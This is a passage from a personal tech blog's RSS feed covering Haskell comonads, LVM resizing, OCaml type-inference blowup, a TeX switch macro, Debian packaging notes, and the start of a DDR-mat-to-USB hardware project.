<span id="cb22-4"><a href="#cb22-4" aria-hidden="true" tabindex="-1"></a>    <span class="kw">where</span></span>
<span id="cb22-5"><a href="#cb22-5" aria-hidden="true" tabindex="-1"></a>      rs <span class="ot">=</span> [ line [f, t, f]</span>
<span id="cb22-6"><a href="#cb22-6" aria-hidden="true" tabindex="-1"></a>           , line [f, f, t]</span>
<span id="cb22-7"><a href="#cb22-7" aria-hidden="true" tabindex="-1"></a>           , line [t, t, t]</span>
<span id="cb22-8"><a href="#cb22-8" aria-hidden="true" tabindex="-1"></a>           ] <span class="op">++</span> <span class="fu">repeat</span> fz</span>
<span id="cb22-9"><a href="#cb22-9" aria-hidden="true" tabindex="-1"></a>      t <span class="ot">=</span> <span class="dt">True</span></span>
<span id="cb22-10"><a href="#cb22-10" aria-hidden="true" tabindex="-1"></a>      f <span class="ot">=</span> <span class="dt">False</span></span>
<span id="cb22-11"><a href="#cb22-11" aria-hidden="true" tabindex="-1"></a>      fl <span class="ot">=</span> <span class="fu">repeat</span> f</span>
<span id="cb22-12"><a href="#cb22-12" aria-hidden="true" tabindex="-1"></a>      fz <span class="ot">=</span> <span class="dt">LZ</span> fl f fl</span>
<span id="cb22-13"><a href="#cb22-13" aria-hidden="true" tabindex="-1"></a>      line l <span class="ot">=</span></span>
<span id="cb22-14"><a href="#cb22-14" aria-hidden="true" tabindex="-1"></a>        <span class="dt">LZ</span> fl f (l <span class="op">++</span> fl)</span></code></pre></div>
<pre><code>*Main&gt; putStr $ disp glider
             
             
             
             
             
             
             
        *    
         *   
       ***   
             
             
             
*Main&gt; putStr $ disp $ evolve glider
             
             
             
             
             
             
             
             
       * *   
        **   
        *    
             
             </code></pre>
<p>We did it ! Implementing Conway’s Game of Life is usually full of ad-hoc
boilerplate code : iterating loops, managing copies of cells, etc. Using the
comonadic structure of cellular automata, the code can be a lot simpler.</p>
<p>In this example, <code>ListZipper</code> and <code>Z</code> should be library functions, so the actual
implementation is only a dozen lines long!</p>
<p>The real benefit is that it has really helped be grasp the concept of comonads.
I hope that I did not just fall into the comonad tutorial fallacy :)</p>
<p><strong>Update (March 10th):</strong> Brian Cohen contributed <a href="http://lpaste.net/83811">a simple extension to simulate
a closed topology</a>. Thanks !</p>
<section id="footnotes" class="footnotes footnotes-end-of-document" role="doc-endnotes">
<hr />
<ol>
<li id="fn1"><p>Or download the <a href="https://github.com/emillon/blog.emillon.org">source on github</a>.<a href="#fnref1" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
<li id="fn2"><p>In the real Haskell typeclass, there are the following differences: Monad
and Functor are not related, <code>join</code> is a library function (you can’t use
it to define an instance), <code>(&gt;&gt;=)</code> is used instead of its flipped
counterpart <code>(=&lt;&lt;)</code> and there two more methods <code>(&gt;&gt;)</code> and <code>fail</code>.<a href="#fnref2" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
<li id="fn3"><p>Simulating a closed topology such as a torus may even be possible using
cyclic lists instead of lazy infinite lists.
<strong>Update:</strong> see Brian Cohen’s response at the end of this post.<a href="#fnref3" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
<li id="fn4"><p>At first I thought that it was possible to only use the <code>Comonad</code> instance
of <code>ListZipper</code> to define <code>horizontal</code> and <code>vertical</code>, but I couldn’t come
up with a solution. But in that case, the <code>z</code> generic parameter is
instanciated to <code>Z</code>, not <code>ListZipper</code>. For that reason I believe that my
initial thought can’t be implemented. Maybe it’s possible with a comonad
transformer or something like that.<a href="#fnref4" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
<li id="fn5"><p>This could have been written in extension as there are only 8 cases, but
it’s funnier and arguably less error prone this way :-)<a href="#fnref5" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
</ol>
</section>]]></description>
    <pubDate>Thu, 18 Oct 2012 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2012-10-18-comonadic-life.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Resizing a LVM partition</title>
    <link>http://blog.emillon.org/posts/2014-05-13-resizing-a-lvm-partition.html</link>
    <description><![CDATA[<p>I like to have <code>/home</code> on a separate partition. But sometimes it can backfire.
If the root partition is full, you don’t have a lot of solutions. In particular,
I found that debian-installer’s “automatic partitioning” sometimes creates very
small root partitions. If you want to install big packages (ghc, eclipse,
libreoffice, …), a 16GiB root partition is not enough.</p>
<p>In the past, filesystems were sitting on directly on top of partitions. It means
that it was very difficult to change their size.</p>
<p>Modern systems (post-1998) can use <a href="http://en.wikipedia.org/wiki/Logical_Volume_Manager_(Linux)">LVM</a>, which is a layer between filesystems
and partitions. One of its advantages is that you can resize logical volumes (a
LV is the virtual device node where the filesystem sits) after they have been
created.</p>
<p>To resize the <code>/</code> and <code>/home</code> filesystems, it is necessary to change the change
the size of both the filesystems and the LVs. But it is not possible to do it in
any order: at any time, the filesystem must be smaller than its LV. So, the
correct order of operations is:</p>
<ul>
<li>shrink home filesystem</li>
<li>shrink home LV</li>
<li>expand root LV</li>
<li>expand root filesystem</li>
</ul>
<p>Wait a second before you start reaching for your favorite live CD: all these
operations can be done online. Actually, the two first ones need <code>/home</code> to be
unmounted, so it has to be done in single user mode. Online expansion of the
root file system is fairly new (it’s from Linux 3.3, 2012) but it works like a
charm.</p>
<p>Manipulating partition and volume sizes are always a bit tricky. Sometimes you
have to give sizes in blocks, sometimes in bytes. Sometimes it’s multiples of
1000 and sometimes it’s multiples of 1024. I would not feel comfortable after
typing 4 commands with 4 sizes. Fortunately, LVM tools are wonderful and can
“talk” to the underlying filesystem (using <a href="http://manpages.debian.org/cgi-bin/man.cgi?query=fsadm&amp;apropos=0&amp;sektion=0&amp;manpath=Debian+8+jessie&amp;format=html&amp;locale=en">fsadm</a>). And LVM knows how much
space is free, so it can expand a partition to fill completely the disk (or more
precisely the volume group).</p>
<p>In a nutshell, this complex operation can be done in two commands (in single
user mode):</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="ex">lvresize</span> <span class="at">-r</span> <span class="at">-L</span> 800G /dev/mapper/machine-home</span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="ex">lvresize</span> <span class="at">-r</span> <span class="at">-l</span> <span class="st">&#39;+100%FREE&#39;</span> /dev/mapper/machine-root</span></code></pre></div>
<p>The <code>-r</code> switch enables <a href="http://manpages.debian.org/cgi-bin/man.cgi?query=fsadm&amp;apropos=0&amp;sektion=0&amp;manpath=Debian+8+jessie&amp;format=html&amp;locale=en">fsadm</a>. <code>-L</code> indicates the new size in terms of bytes,
and <code>-l</code> in terms of LVM units (<code>+100%FREE</code> means: increase by the whole free
space, ie fill the volume group).</p>
<p>That was almost too easy!</p>]]></description>
    <pubDate>Tue, 13 May 2014 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2014-05-13-resizing-a-lvm-partition.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Making type inference explode</title>
    <link>http://blog.emillon.org/posts/2014-05-21-making-type-inference-explode.html</link>
    <description><![CDATA[<p>Hindley-Milner type systems are in a sweet spot in that they are both expressive
and easy to infer. For example, type inference can turn this program:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> <span class="kw">rec</span> length = <span class="kw">function</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a>  | [] -&gt; <span class="dv">0</span> </span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a>  | x::xs -&gt; <span class="dv">1</span> + length xs</span></code></pre></div>
<p>into this one (the top-level type <code>'a list -&gt; int</code> is usually what is
interesting but the compiler has to infer the type of every subexpression):</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> <span class="kw">rec</span> length : &#39;a <span class="dt">list</span> -&gt; <span class="dt">int</span> = <span class="kw">function</span></span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a>  | [] -&gt; (<span class="dv">0</span> : <span class="dt">int</span>)</span>
<span id="cb2-3"><a href="#cb2-3" aria-hidden="true" tabindex="-1"></a>  | (x:&#39;a)::(xs : &#39;a <span class="dt">list</span>) -&gt; (<span class="dv">1</span> : <span class="dt">int</span>)</span>
<span id="cb2-4"><a href="#cb2-4" aria-hidden="true" tabindex="-1"></a>        + ((length : &#39;a <span class="dt">list</span> -&gt; <span class="dt">int</span>) (xs : &#39;a <span class="dt">list</span>) : <span class="dt">int</span>)</span></code></pre></div>
<p>Because the compiler does so much work, it is reasonable to wonder whether it is
efficient. The theoretical answer to this question is that type inference is
EXP-complete, but given reasonable constraints on the program, it can be done in
quasi-linear time (<span class="math inline"><em>n</em> log  <em>n</em></span> where <span class="math inline"><em>n</em></span> is the size of the program).</p>
<p>Still, one may wonder what kind of pathological cases show this exponential
effect. Here is one such example:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode ocaml"><code class="sourceCode ocaml"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> p x y = <span class="kw">fun</span> z -&gt; z x y ;;</span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> r () =</span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> x1 = <span class="kw">fun</span> x -&gt; p x x <span class="kw">in</span></span>
<span id="cb3-5"><a href="#cb3-5" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> x2 = <span class="kw">fun</span> z -&gt; x1 (x1 z) <span class="kw">in</span></span>
<span id="cb3-6"><a href="#cb3-6" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span> x3 = <span class="kw">fun</span> z -&gt; x2 (x2 z) <span class="kw">in</span></span>
<span id="cb3-7"><a href="#cb3-7" aria-hidden="true" tabindex="-1"></a>x3 (<span class="kw">fun</span> z -&gt; z);;</span></code></pre></div>
<p>The type signature of <code>r</code> is already daunting:</p>
<pre><code>% ocamlc -i types.ml
val p : &#39;a -&gt; &#39;b -&gt; (&#39;a -&gt; &#39;b -&gt; &#39;c) -&gt; &#39;c
val r :
  unit -&gt;
  ((((((((&#39;a -&gt; &#39;a) -&gt; (&#39;a -&gt; &#39;a) -&gt; &#39;b) -&gt; &#39;b) -&gt;
       (((&#39;a -&gt; &#39;a) -&gt; (&#39;a -&gt; &#39;a) -&gt; &#39;b) -&gt; &#39;b) -&gt; &#39;c) -&gt;
      &#39;c) -&gt;
     (((((&#39;a -&gt; &#39;a) -&gt; (&#39;a -&gt; &#39;a) -&gt; &#39;b) -&gt; &#39;b) -&gt;
       (((&#39;a -&gt; &#39;a) -&gt; (&#39;a -&gt; &#39;a) -&gt; &#39;b) -&gt; &#39;b) -&gt; &#39;c) -&gt;
      &#39;c) -&gt;
     &#39;d) -&gt;
    &#39;d) -&gt;
   (((((((&#39;a -&gt; &#39;a) -&gt; (&#39;a -&gt; &#39;a) -&gt; &#39;b) -&gt; &#39;b) -&gt;
       (((&#39;a -&gt; &#39;a) -&gt; (&#39;a -&gt; &#39;a) -&gt; &#39;b) -&gt; &#39;b) -&gt; &#39;c) -&gt;
      &#39;c) -&gt;
     (((((&#39;a -&gt; &#39;a) -&gt; (&#39;a -&gt; &#39;a) -&gt; &#39;b) -&gt; &#39;b) -&gt;
       (((&#39;a -&gt; &#39;a) -&gt; (&#39;a -&gt; &#39;a) -&gt; &#39;b) -&gt; &#39;b) -&gt; &#39;c) -&gt;
      &#39;c) -&gt;
     &#39;d) -&gt;
    &#39;d) -&gt;
   &#39;e) -&gt;
  &#39;e</code></pre>
<p>But what’s interesting about this program is that we can add (or remove) lines
to study how input size can alter the processing time and output type size. It
explodes:</p>
<table>
<thead>
<tr>
<th>n</th>
<th style="text-align: right;">wc -c</th>
<th style="text-align: right;">time</th>
<th style="text-align: right;">leaves(n)</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td style="text-align: right;">98</td>
<td style="text-align: right;">15ms</td>
<td style="text-align: right;">1</td>
</tr>
<tr>
<td>2</td>
<td style="text-align: right;">167</td>
<td style="text-align: right;">15ms</td>
<td style="text-align: right;">2</td>
</tr>
<tr>
<td>3</td>
<td style="text-align: right;">610</td>
<td style="text-align: right;">15ms</td>
<td style="text-align: right;">8</td>
</tr>
<tr>
<td>4</td>
<td style="text-align: right;">11630</td>
<td style="text-align: right;">38ms</td>
<td style="text-align: right;">128</td>
</tr>
<tr>
<td>5</td>
<td style="text-align: right;">4276270</td>
<td style="text-align: right;">6.3s</td>
<td style="text-align: right;">32768</td>
</tr>
</tbody>
</table>
<p>Observing the number of <code>('a -&gt; 'a)</code> leaves in the output type reveals that it
is is squared and doubled at each step, leading to an exponential growth.</p>
<p>In practice, this effect does not appear in day-to-day programs because
programmers annotate the top-level declarations with their types. In that case,
the size of the types would be merely proportional to the size of the program,
because the type annotation would be gigantic.</p>
<p>Also, programmers tend to write functions that do something useful, which these
do not seem to do ☺.</p>]]></description>
    <pubDate>Wed, 21 May 2014 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2014-05-21-making-type-inference-explode.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Bring your own switch</title>
    <link>http://blog.emillon.org/posts/2014-06-05-bring-your-own-switch.html</link>
    <description><![CDATA[<p>TeX is a very primitive language. Everything is dynamic, even parsing. This
explains in part why it’s so long to compile.</p>
<p>It also means that it’s very flexible : it’s possible to define your own control
structures. Here is a small explanation of an implementation of a “switch” macro
I made last year. It is released as part of my
<a href="https://github.com/emillon/discotex">discotex</a> library (a collection of macros,
really).</p>
<p>We want to define a control structure that we can use in the following way:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode latex"><code class="sourceCode latex"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="fu">\switch</span>{what}{case1}{then1}</span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a>             {case2}{then2}</span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a>             {case3}{then3}</span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a>             {END}</span></code></pre></div>
<p>Then, if <code>what</code> is equal to <code>case1</code>, the whole construct evaluates to <code>then1</code>,
etc. This looks like a function with a variable number of arguments, but
actually this is well adapted to how TeX works.</p>
<p>In TeX, control is provided through macros, i.e. rules to rewrite text. Suppose
we want to do a macro  that expands to “x and y”. LaTeX users are
used to the following syntax:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode latex"><code class="sourceCode latex"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="fu">\newcommand</span>{<span class="ex">\couple</span>}[2]{#1 and #2}</span></code></pre></div>
<p>But in TeX this is written:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode latex"><code class="sourceCode latex"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="fu">\def\couple</span>#1#2{#1 and #2}</span></code></pre></div>
<p>Which roughly means that after reading <code>\couple</code>, TeX will read two strings<a href="#fn1" class="footnote-ref" id="fnref1" role="doc-noteref"><sup>1</sup></a>
and bind them to <code>#1</code> and <code>#2</code> in the body. So <code>\couple{A}{B}</code> is expanded to <code>A and B</code>.</p>
<p>Here comes the trick used for defining variadic functions: if more arguments are
provided than the number of arguments at the definition point, the extra ones
are kept at their place. If fewer arguments are provided, the strings after the
call site will be used. So, one can look at TeX functions as just a system to
pop strings from the calling site.</p>
<p>Using this, we can implement <code>\switch</code>:</p>
<ul>
<li><p>After reading <code>\switch</code>, read two arguments so that we’re considering
<code>\switch{what}{x}</code>.</p>
<ul>
<li>If <code>x</code> is equal to <code>END</code>, it is an error: we did not find the entry. The
<code>END</code> string is not special to TeX, it is just a convention of our macro.</li>
</ul></li>
<li><p>Otherwise, pop one more string so that we’re considering
<code>\switch{what}{case}{then}</code>.</p>
<ul>
<li>If <code>what</code> is not equal to <code>case</code>, we have to recursively call
<code>\switch{what}</code> which will pop the rest.</li>
</ul></li>
<li><p>If <code>what</code> is equal to <code>case</code>, then the result is <code>then</code>. But it is not
enough to return it: we have to pop strings until <code>END</code> is reached.
Otherwise they would be output normally and put it the document.</p></li>
</ul>
<p>These 3 points map well to the final TeX code.</p>
<p>To read the first case, we write a function with only two parameters. For string
comparison we use <code>\ifstrequal{a}{b}{t}{f}</code><a href="#fn2" class="footnote-ref" id="fnref2" role="doc-noteref"><sup>2</sup></a> which expands to <code>t</code> if <code>a</code> and
<code>b</code> are equal, or <code>f</code> otherwise. Note that <code>\switch@next</code> is the name of a
function. In <code>.sty</code> files, it is possible to use <code>@</code> in symbol names. It is a
convention for private macros as they can not be directly used in <code>.tex</code> files.</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode latex"><code class="sourceCode latex"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="fu">\def\switch</span>#1#2{</span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a>  <span class="fu">\ifstrequal</span>{#2}{END}{</span>
<span id="cb4-3"><a href="#cb4-3" aria-hidden="true" tabindex="-1"></a>    <span class="fu">\errmessage</span>{switch : case &quot;#1&quot; not found}</span>
<span id="cb4-4"><a href="#cb4-4" aria-hidden="true" tabindex="-1"></a>  }{</span>
<span id="cb4-5"><a href="#cb4-5" aria-hidden="true" tabindex="-1"></a>    <span class="fu">\switch@next</span>{#1}{#2}</span>
<span id="cb4-6"><a href="#cb4-6" aria-hidden="true" tabindex="-1"></a>  }</span>
<span id="cb4-7"><a href="#cb4-7" aria-hidden="true" tabindex="-1"></a>}</span></code></pre></div>
<p>It is also used to do the actual comparison and the recursive call.</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode latex"><code class="sourceCode latex"><span id="cb5-1"><a href="#cb5-1" aria-hidden="true" tabindex="-1"></a><span class="fu">\def\switch@next</span>#1#2#3{</span>
<span id="cb5-2"><a href="#cb5-2" aria-hidden="true" tabindex="-1"></a>  <span class="fu">\ifstrequal</span>{#1}{#2}</span>
<span id="cb5-3"><a href="#cb5-3" aria-hidden="true" tabindex="-1"></a>    {#3<span class="fu">\switch@last</span>}</span>
<span id="cb5-4"><a href="#cb5-4" aria-hidden="true" tabindex="-1"></a>    {</span>
<span id="cb5-5"><a href="#cb5-5" aria-hidden="true" tabindex="-1"></a>      <span class="fu">\switch</span>{#1}</span>
<span id="cb5-6"><a href="#cb5-6" aria-hidden="true" tabindex="-1"></a>    }</span>
<span id="cb5-7"><a href="#cb5-7" aria-hidden="true" tabindex="-1"></a>}</span></code></pre></div>
<p>Then <code>\switch@last</code> is a simple recursive function which simulates a loop.
Because the recursive call is done without an explicit parameter, it will keep
on popping strings until finding <code>END</code>.</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode latex"><code class="sourceCode latex"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="fu">\def\switch@last</span>#1{</span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a>  <span class="fu">\ifstrequal</span>{#1}{END}{}</span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a>  {<span class="fu">\switch@last</span>}</span>
<span id="cb6-4"><a href="#cb6-4" aria-hidden="true" tabindex="-1"></a>}</span></code></pre></div>
<p>That’s it, the macro works. <a href="https://github.com/emillon/discotex">You can even try it!</a></p>
<p>I am not sure that I would like to write more complex control structures but
this was useful to me both in writing it and using it. I hope that you enjoyed
it!</p>
<section id="footnotes" class="footnotes footnotes-end-of-document" role="doc-endnotes">
<hr />
<ol>
<li id="fn1"><p>I am not sure that this is the correct denomination. For example it will
read a string between curly braces, or a single character if they are omitted.
In that case it also eats whitespace, which is why you need stuff like <code>\xspace</code>
to prevent your macros from glueing string together.<a href="#fnref1" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
<li id="fn2"><p>It is from the <code>etoolbox</code> package. How it works is an implementation
detail here, though it would probably be interesting.<a href="#fnref2" class="footnote-back" role="doc-backlink">↩︎</a></p></li>
</ol>
</section>]]></description>
    <pubDate>Thu, 05 Jun 2014 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2014-06-05-bring-your-own-switch.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>My part of work in Debian Jessie</title>
    <link>http://blog.emillon.org/posts/2014-11-21-my-part-of-work-in-debian-jessie.html</link>
    <description><![CDATA[<p>Right now, Debian Jessie is frozen, and in a fairly good shape. The amount of RC
bugs is low, which means that the release should be “quite” near (“when it is
ready”).</p>
<p>It is a good time to make a summary of my contributions during this release
cycle.</p>
<h2 id="new-packages-in-debian">New packages in Debian</h2>
<p>For Jessie I have added no less than 6 new packages to the archive.</p>
<p><a href="http://subliminal.readthedocs.org/">subliminal</a> is a tool to automatically download subtitles for movie files.
Packaging it required to also package a few of its dependencies that were not
available in Debian: <a href="http://babelfish.readthedocs.org/">babelfish</a>, <a href="http://enzyme.readthedocs.org/">enzyme</a>, <a href="http://guessit.readthedocs.org/">guessit</a>, and <a href="https://github.com/byroot/pysrt">pysrt</a>.</p>
<p><a href="https://github.com/sahib/glyr">glyr</a> is a library to query lyrics sites. I packaged it because the new
version of gmpc requires it, but at the moment it is just a leaf package.</p>
<h2 id="new-packages-im-taking-care-of">New packages I’m taking care of</h2>
<p>I have the pleasure of being the new maintainer for <a href="https://pythonhosted.org/feedparser/">feedparser</a>, a Python
library for parsing RSS and Atom feeds. It is my most popular package: according
to popcon, 40% of users have it installed! During this released, I ported back
the work made on Ubuntu, and worked on providing a Python 3 version of this
package.</p>
<h2 id="updates-on-my-packages">Updates on my packages</h2>
<p><a href="http://gmpc.wikia.com/wiki/Gnome_Music_Player_Client">gmpc</a> and <a href="http://gmpc.wikia.com/wiki/Plugins">gmpc-plugins</a> did not change a lot. Upstream is working on a big new
version but it is not released yet. During this Debian cycle, I mostly did
janitorial work: I disabled outdated provider plugins, enable multi-arch
support, and ported to a recent version of Vala.</p>
<p><a href="https://github.com/wking/rss2email">rss2email</a> got a new upstream maintainer. This is really great since the code
needed some love. The whole program got rewritten in Python 3, and this mandated
a major version bump, creating the rss2email 3.x branch.</p>
<p>One of the side-effects of this rewrite is that the configuration file format
changed. Actually the 2.x version used a plain python file for configuration,
which was <code>eval()</code>uated within the program’s context. Now it is based on
ConfigParser. The on-disk state file, which serializes what feeds you are
subscribed to, and what is the last time you refreshed them, changed its format
too from a pickle file to a JSON file.</p>
<p>This incompatibility is necessary and welcome, but is tough to manage within the
context of a software distribution. If a user upgrades his packages, he should
find his programs working as before. So, I wrote a <code>r2e-migrate</code>
<a href="https://github.com/emillon/rss2email-debian/blob/master/debian/r2e-migrate">script</a> that converts a 2.x state file to a 3.x state file.
Designing a clean upgrade path was very interesting. Indeed, it is not possible
to do this during the package installation: since the config and state files are
in every user’s $HOME, it is necessary to wait for each user to do his
migration. The solution I arrived at is the following: when rss2email 3.x
starts, and has no state file, it checks if a rss2email 2.x exists. Then it
prompts the user to run <code>r2e-migrate</code>. A few iterations were necessary before it
worked as I wanted, so I am happy to have used the experimental suite for this.
Once everything was working I uploaded the package to unstable and it seems to
be working well. I am very happy with how this went, and I could close a lot of
bugs in this package, also thanks to the new responsive upstream.</p>
<p><a href="http://sourceforge.net/projects/vba/">visualboyadvance</a> only got cosmetic changes: a patch for fixing the build with
the new GCC flags, enabling hardening etc. I somehow missed the notification
email for an important bug (#740292) with a patch that I merged but
unfortunately it is too late to include it in Jessie. I would like to give the
package more love for the next release, maybe including the newer vba-m fork.</p>
<p><a href="http://www.zsnes.com/">zsnes</a> is an interesting package to maintain because it’s written in x86
assembly and has been dormant upstream for a few years now. During this release
cycle there were no real breakthroughs, but a lot of little niceties. For
example, we now have a debug package, and build packages for kfreebsd and the
hurd. Enabling hardening options also made us discover several memory
manipulation errors.</p>
<p>I would like to include a more recent upstream snapshot, but the whole situation
seems to be a little complicated as there seem to be several forks lying around.</p>
<h2 id="package-given-for-adoption">Package given for adoption</h2>
<p>In 2012 I started to take care of the coin* packages. I adopted <a href="http://www.coin-or.org/projects/Cbc.xml">coinor-cbc</a> and
began to plan a transition plan for all the related packages, but because of a
lack of time and interest I did not go all the way.</p>
<p>Fortunately Miles Lubin proposed to adopt these packages and is doing a great
work on them. Thanks Miles!</p>
<h2 id="incomplete-work">Incomplete work</h2>
<p>I wanted to package several programs that did not make it to the archive.</p>
<p><a href="https://sites.google.com/site/broguegame/">brogue</a> is a rogue-like in the most traditional fashion: grid-based and turn by
turn. Most of the packaging work I did was on an unpackaged dependency,
<a href="http://roguecentral.org/doryen/libtcod/">libtcod</a>. It needed a bit of work so that it can be used installed in <code>/usr</code>
and not from an unpacked source tree.</p>
<p><a href="https://code.google.com/p/opentyrian/">opentyrian</a> is a free rewrite of the classic shoot-em-up Tyrian. As usual for
this kind of projects, it only covers the software part. You still need a copy
of the original game to play. In that case it is easier since the game can be
downloaded from the author’s website. But since it is not free, Debian can not
host these files. So it is necessary to download it at install time using a tool
named <code>game-data-packager</code>. I worked with Alexandre Detiste on a patch to
support this (<a href="https://bugs.debian.org/739486">#739486</a>), but unfortunately the project seems dormant and it is
blocking for the inclusion of opentyrian in Debian.</p>
<p><a href="http://www.stepmania.com/">stepmania</a> is an open source clone of the “Dance Dance Revolution” game. It is
a very popular piece of software, and an Intend To Package bug has been open for
it since 2003. But it used to include non-free (and actually,
copyright-infringing) pieces of artwork from the original game, which used to
make it unsuitable for inclusion. However the newer versions are more compliant
and I am still working on this. There are two problems remaining: first, there
is a lot of code and artwork for which the copyright and licensing information
is unclear (though it does seem that the infringing material has been removed).
And second, it embeds a lot of libraries; it’s necessary to patch it so that it
can use the system copies. I sincerely hope that it will be part of Stretch
since I could not deliver it for Jessie.</p>
<h2 id="debian-maintainer">Debian Maintainer</h2>
<p>So far, every time I need to push a package to the Debian archive, I need to ask
someone with upload permissions to review my work and upload it. It ensures that
the archive stays legal and with a great quality, but it is definitely a
non negligible amount of friction every time I need to upload a package.</p>
<p>A couple weeks ago I decided to apply as a Debian Maintainer. Once this will be
done, I will be able to upload my packages without this sponsoring step.
Exciting!</p>
<p>Let’s all hope that the freeze will be over soon and we will enjoy once again a
great release.</p>]]></description>
    <pubDate>Fri, 21 Nov 2014 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2014-11-21-my-part-of-work-in-debian-jessie.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Converting a Dance Dance Revolution mat to USB</title>
    <link>http://blog.emillon.org/posts/2014-11-27-converting-a-dance-dance-revolution-mat-to-usb.html</link>
    <description><![CDATA[<p><strong>Abstract:</strong> <em>I transform a Playstation/parallel port converter to USB. This
includes finding the pinout of the previous circuit, making an AVR toolchain
work, and writing the firmware. Some bugs are found, and fixed. The
<a href="https://github.com/emillon/psx-usb">result</a> is open source.</em></p>
<p>Do you pine for the days when people were people and wrote their own device
drivers? Some days are still like that, you just have to take the opportunity.</p>
<p>Recently while organizing my place I found two abandoned items that were meant
to meet each other: a Dance Dance Revolution mat and a Teensy++ development
board. This project is the story of their union.</p>
<h2 id="finding-the-pinout">Finding the pinout</h2>
<p>So, I stumbled upon an old DDR mat and I wanted to play with it. The easiest way
is using <a href="http://www.stepmania.com/">Stepmania</a>, a simulator that works on Linux (and that I am trying to
<a href="http://blog.emillon.org/posts/2014-11-21-my-part-of-work-in-debian-jessie.html">package for Debian</a>). But some interface is needed to connect
dancing mats (usually made for the Playstation) to a computer.</p>
<p>In a previous life I replaced the Playstation connector of this mat with a
parallel port connector. In the beginning of the 2000s, the popular circuit to
do this was <a href="http://arcadecontrols.com/Mirrors/www.ziplabel.com/dpadpro/psx.html">Direct Pad Pro</a>, and on Linux there was a similar driver documented
in <a href="https://www.kernel.org/doc/Documentation/input/joystick-parport.txt">joystick-parport.txt</a>.</p>
<p>Needless to say, I do not have a parallel port on my computer anymore, so some
conversion is required. I also happen to have a USB development board on hand,
so a possible solution is to program it to drive the Playstation mat.</p>
<figure>
<img src="/img/ddr/mat.jpg" alt="A DDR mat with unusual connectors" />
<figcaption aria-hidden="true">A DDR mat with unusual connectors</figcaption>
</figure>
<p>On the above picture, two things are connected to the parallel port: the DDR mat
and a female SNES connector. The driver indeed supported several gamepads, even
of different types.</p>
<p>The first step was to note the pinout of the existing connection:</p>
<figure>
<img src="/img/ddr/inside.jpg" alt="Strange things inside the connector" />
<figcaption aria-hidden="true">Strange things inside the connector</figcaption>
</figure>
<pre><code>DB25

 2 ───────── orange
 3 ───────── yellow
 4 ───────── blue
 5 ──▷|─┐
 6 ──▷|─┤
 7 ──▷|─┼─── pink
 8 ──▷|─┤
 9 ──▷|─┘
11 ───────── brown
19 ─────┐
20 ─────┤
21 ─────┤
22 ─────┼─── black
23 ─────┤
24 ─────┤
25 ─────┘
      NC  ── green</code></pre>
<p>Looking at the kernel documentation, it means that the 11 is the data pin for
the Playstation connector (the SNES pad was #1 and the PSX pad was #2).</p>
<p>This was enough to reconstruct the correct pinout. Note that the kernel numbers
PSX pins in the opposite order of everything else I have seen. The following
table uses kernel order.</p>
<table>
<thead>
<tr>
<th style="text-align: center;">Color</th>
